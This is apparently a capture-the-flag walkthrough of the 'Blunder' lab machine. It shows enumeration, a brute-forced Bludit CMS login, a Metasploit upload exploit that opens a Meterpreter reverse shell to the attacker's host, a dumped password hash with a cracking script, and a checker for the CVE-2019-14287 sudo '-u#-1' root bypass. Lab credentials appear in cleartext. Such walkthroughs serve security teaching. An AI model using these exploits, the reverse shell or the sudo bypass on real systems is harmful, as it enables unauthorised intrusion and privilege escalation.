# Blunder

## Enumeration

### nmap

```
$ nmap -sC -sV -oN nmap.txt 10.10.10.191

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 21:56 BST
Nmap scan report for 10.10.10.191
Host is up (0.066s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.28 seconds
```

{% hint style="info" %}
Apache httpd 2.4.41 (Ubuntu)
{% endhint %}

### dirsearch

```
$ ./dirsearch.py -u 10.10.10.191 -e *

[21:28:51] 200 -    7KB - /0
[21:28:56] 200 -    3KB - /about
[21:28:58] 301 -    0B  - /admin  ->  http://10.10.10.191/admin/
[21:29:00] 200 -    2KB - /admin/
[21:29:00] 200 -    2KB - /admin/.config
[21:29:00] 200 -    2KB - /admin/?/login
...
...
...
[21:29:03] 200 -    2KB - /admin/web/
[21:29:03] 200 -    2KB - /admin/user_count.txt
[21:29:03] 200 -    2KB - /admin/uploads.php
[21:29:31] 301 -    0B  - /domcfg.nsf/?open  ->  http://10.10.10.191/domcfg.nsf
[21:29:42] 200 -   30B  - /install.php
[21:29:45] 200 -    1KB - /LICENSE
[21:30:03] 200 -    3KB - /README.md
[21:30:04] 200 -   22B  - /robots.txt
```

### wfuzz

```
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u "http://10.10.10.191/FUZZ.txt" -t 100

===================================================================
ID           Response   Lines    Word     Chars       Payload                                      
===================================================================

000003519:   200        1 L      4 W      22 Ch       "robots"                                     
000004125:   200        4 L      23 W     118 Ch      "todo"    

```

### <http://10.10.10.191/admin/>

![](/files/-MEt4abA3LmXQmiDMPmQ)

### <http://10.10.10.191/todo.txt>

![](/files/-MEt4kodE9yE2sQWc5Oj)

{% hint style="success" %}
Potential username: fergus
{% endhint %}

After extensive enumeration, the only directly useful find was the "todo.txt" file, which contains a possible username ("fergus"). The /admin/ path is the login page of the Bludit CMS, and the version (3.9.2) is visible in the `?version=` suffix of the asset URLs in its page source.

### Creating wordlist with cewl

`$ cewl -w wordlists.txt -d 10 -m 1 10.10.10.191/`

### Bruteforcing login credentials

![](/files/-MEtDGMmxI7GX_oCzQGQ)

## Exploitation

### Metasploit

```
msf5 > use exploit/linux/http/bludit_upload_images_exec

[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf5 exploit(linux/http/bludit_upload_images_exec) > show options

Module options (exploit/linux/http/bludit_upload_images_exec):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BLUDITPASS                   yes       The password for Bludit
   BLUDITUSER                   yes       The username for Bludit
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       80               yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       The base path for Bludit
   VHOST                        no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.17.168   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Bludit v3.9.2


msf5 exploit(linux/http/bludit_upload_images_exec) > set rhosts 10.10.10.191
rhosts => 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) > set bludituser fergus
bludituser => fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set bluditpass RolandDeschain
bluditpass => RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(linux/http/bludit_upload_images_exec) > set lhost 10.10.14.189
lhost => 10.10.14.189
msf5 exploit(linux/http/bludit_upload_images_exec) > run

[*] Started reverse TCP handler on 10.10.14.189:4444 
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading BamMBogTOe.png...
[*] Uploading .htaccess...
[*] Executing BamMBogTOe.png...
[*] Sending stage (38288 bytes) to 10.10.10.191
[*] Meterpreter session 1 opened (10.10.14.189:4444 -> 10.10.10.191:43256) at 2020-08-16 22:46:40 +0100
[+] Deleted .htaccess

meterpreter > ls
Listing: /var/www/bludit-3.9.2/bl-content/tmp
=============================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40755/rwxr-xr-x  4096  dir   2020-08-16 22:52:22 +0100  thumbnails

meterpreter > cd /home
meterpreter > ls
Listing: /home
==============

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40755/rwxr-xr-x  4096  dir   2020-05-26 09:29:29 +0100  hugo
40755/rwxr-xr-x  4096  dir   2020-04-28 12:13:35 +0100  shaun

```

## PrivEsc

```
meterpreter > shell
Process 3417 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
python -c "import pty;pty.spawn('/bin/bash')"
www-data@blunder:/$ ls
bin    dev  home   lib64       media  proc  sbin  sys  var
boot   etc  lib    libx32      mnt    root  snap  tmp
cdrom  ftp  lib32  lost+found  opt    run   srv   usr
www-data@blunder:/$ cd var
www-data@blunder:/var$ ls
backups  crash	local  log   metrics  run   spool  www
cache	 lib	lock   mail  opt      snap  tmp
www-data@blunder:/var$ cd www
www-data@blunder:/var/www$ ls
bludit-3.10.0a	bludit-3.9.2  html
www-data@blunder:/var/www$ cd bludit-3.10.0a
www-data@blunder:/var/www/bludit-3.10.0a$ ls
LICENSE    bl-content  bl-languages  bl-themes	install.php
README.md  bl-kernel   bl-plugins    index.php
www-data@blunder:/var/www/bludit-3.10.0a$ cd bl-content
www-data@blunder:/var/www/bludit-3.10.0a/bl-content$ ls
databases  pages  tmp  uploads	workspaces
www-data@blunder:/var/www/bludit-3.10.0a/bl-content$ cd databases
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ ls
categories.php	plugins       site.php	  tags.php
pages.php	security.php  syslog.php  users.php
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""}
}
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$
```

{% hint style="info" %}
User: hugo (the Bludit "admin" account, nickname Hugo, matching the /home/hugo directory)\
Password hash: faca404fd5c0a31cf1897b823c695c85cffeb98d (SHA-1; this entry has no "salt" field, so it is an unsalted hash of the password)
{% endhint %}

![](/files/-MEtGKPiFu5RG3L0eRp0)

![](/files/-MEtGW1DC33WswmXDGQQ)
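Bludit hashes passwords as `sha1(password . salt)` (`Users::generatePasswordHash`), so an entry without a `salt` key, like Hugo's above, is a plain SHA-1 of the password and cracks with hashcat mode 100 (mode 110 for salted entries). The script below is an added example, not from the page: it parses the PHP-guarded JSON layout of `users.php` and tries a wordlist against every user in it, honouring a salt when one is present. The `SAMPLE_USERS_PHP` it ships with is a constructed file in the same layout with made-up passwords, so the example runs offline; point it at the real dump and the cewl list to reproduce the step in the screenshot.

```python
"""Recover Bludit user passwords from bl-content/databases/users.php.

Added example. Bludit stores sha1(password + salt); entries without a "salt"
key (as in the dump above) are plain SHA-1. Runs offline against a
constructed users.php; pass a real file and wordlist on the command line.
"""
import hashlib
import json
import re

# The first line of every Bludit database file is a PHP guard, then plain JSON.
PHP_GUARD = re.compile(r"^<\?php.*?\?>\s*", re.S)


def parse_users_php(text):
    """Strip the '<?php defined(...) ?>' guard and load the JSON body."""
    return json.loads(PHP_GUARD.sub("", text, count=1))


def bludit_hash(password, salt=""):
    """Bludit's password hash: sha1(password . salt), hex-encoded."""
    return hashlib.sha1((password + salt).encode()).hexdigest()


def crack(users, candidates):
    """Map username -> recovered password for every user whose hash is in the wordlist."""
    found = {}
    for name, entry in users.items():
        salt = entry.get("salt", "")            # missing salt == unsalted SHA-1
        target = entry["password"].lower()
        for password in candidates:
            if bludit_hash(password, salt) == target:
                found[name] = password
                break
    return found


# Constructed users.php in the layout dumped above, with made-up passwords
# (one unsalted entry like Hugo's, one salted entry as newer Bludit writes).
SAMPLE_USERS_PHP = "<?php defined('BLUDIT') or die('Bludit CMS.'); ?>\n" + json.dumps({
    "admin": {"nickname": "Hugo", "role": "User",
              "password": bludit_hash("example-only"),
              "registered": "2019-11-27 07:40:55"},
    "editor": {"nickname": "Demo", "role": "Editor", "salt": "abc123",
               "password": bludit_hash("salted-demo", "abc123")},
}, indent=4)


if __name__ == "__main__":
    import sys
    # Usage: python3 bludit_crack.py users.php wordlists.txt   (no args: offline sample)
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_USERS_PHP
    words = (open(sys.argv[2], encoding="utf-8", errors="ignore").read().split()
             if len(sys.argv) > 2 else ["wrong", "example-only", "salted-demo"])
    print(crack(parse_users_php(text), words))
```

The recovered password is then tried with `su hugo`, since Bludit's admin and the local user share the name; that is what the screenshots above show.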

### Getting user.txt

![](/files/-MEtH-woJZnxlAhdOi1M)

### Getting root.txt

![](/files/-MEtHYxSTijoUyXFUDD6)

{% embed url="<https://www.exploit-db.com/exploits/47502>" %}

![](/files/-MEtHkxV0a979Ht4TO5B)
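The embedded exploit-db entry 47502 is the sudo security bypass for sudo before 1.8.28 (CVE-2019-14287): a sudoers rule of the form `(ALL, !root) <command>` is meant to allow the command as any user except root, but a vulnerable sudo mis-handles the user id `-1` (`sudo -u#-1 ...`) and runs the command as uid 0. The script below is an added example, not part of the page or of the exploit-db entry: it parses `sudo -l` and `sudo --version` output, reports which rules have that shape, and prints the corresponding command only when the version is affected. The sample `sudo -l` text is constructed in the layout sudo prints; the real box's output is in the screenshot.

```python
"""Check sudo -l output for the (ALL, !root) rule shape that exploit-db 47502
(CVE-2019-14287, sudo < 1.8.28) turns into root.

Added example. Feed it the text of `sudo -l` and `sudo --version`; it reports
bypassable rules and the -u#-1 invocation for each, or nothing if sudo is
patched. The SAMPLE_* strings are constructed.
"""
import re

# "    (ALL, !root) NOPASSWD: /bin/bash"  ->  runas="ALL, !root", cmd="/bin/bash"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+?)\s*$")
VERSION_RE = re.compile(r"Sudo version (\d+)\.(\d+)\.(\d+)")
FIXED_IN = (1, 8, 28)


def parse_sudo_l(text):
    """Return (runas_spec, command) pairs from the 'may run the following commands' block."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if in_rules:
            match = RULE_RE.match(line)
            if match:
                rules.append((match.group("runas").strip(), match.group("cmd")))
    return rules


def bypassable_rules(rules):
    """Commands whose run-as user list is ALL with root excluded: the -u#-1 targets."""
    out = []
    for runas, cmd in rules:
        # "(users : groups)"; only the user list matters here
        users = [u.strip() for u in runas.split(":")[0].split(",")]
        if "ALL" in users and "!root" in users:
            out.append(cmd)
    return out


def sudo_affected(version_output):
    """True when the first 'Sudo version x.y.z' line is older than 1.8.28."""
    match = VERSION_RE.search(version_output)
    if not match:
        raise ValueError("no 'Sudo version' line found")
    return tuple(int(x) for x in match.groups()) < FIXED_IN


def bypass_commands(sudo_l_text, version_output):
    """The sudo -u#-1 invocations that would yield root, or [] if sudo is patched."""
    if not sudo_affected(version_output):
        return []
    return [f"sudo -u#-1 {cmd}" for cmd in bypassable_rules(parse_sudo_l(sudo_l_text))]


# Constructed samples in the layout sudo prints (the box's real output is in the screenshot).
SAMPLE_SUDO_L = """Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
"""
SAMPLE_VERSION = "Sudo version 1.8.27\nSudoers policy plugin version 1.8.27\n"

if __name__ == "__main__":
    # Typical use on the target: python3 sudo_check.py <(sudo -l) <(sudo --version)
    import sys
    if len(sys.argv) == 3:
        sudo_l, version = (open(p, encoding="utf-8").read() for p in sys.argv[1:3])
    else:
        sudo_l, version = SAMPLE_SUDO_L, SAMPLE_VERSION
    print(bypass_commands(sudo_l, version) or "sudo is patched or no (ALL, !root) rule")
```

The version check matters as much as the rule: on a patched sudo, `-u#-1` is simply rejected, so the rule alone is not enough to claim the box is rootable.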

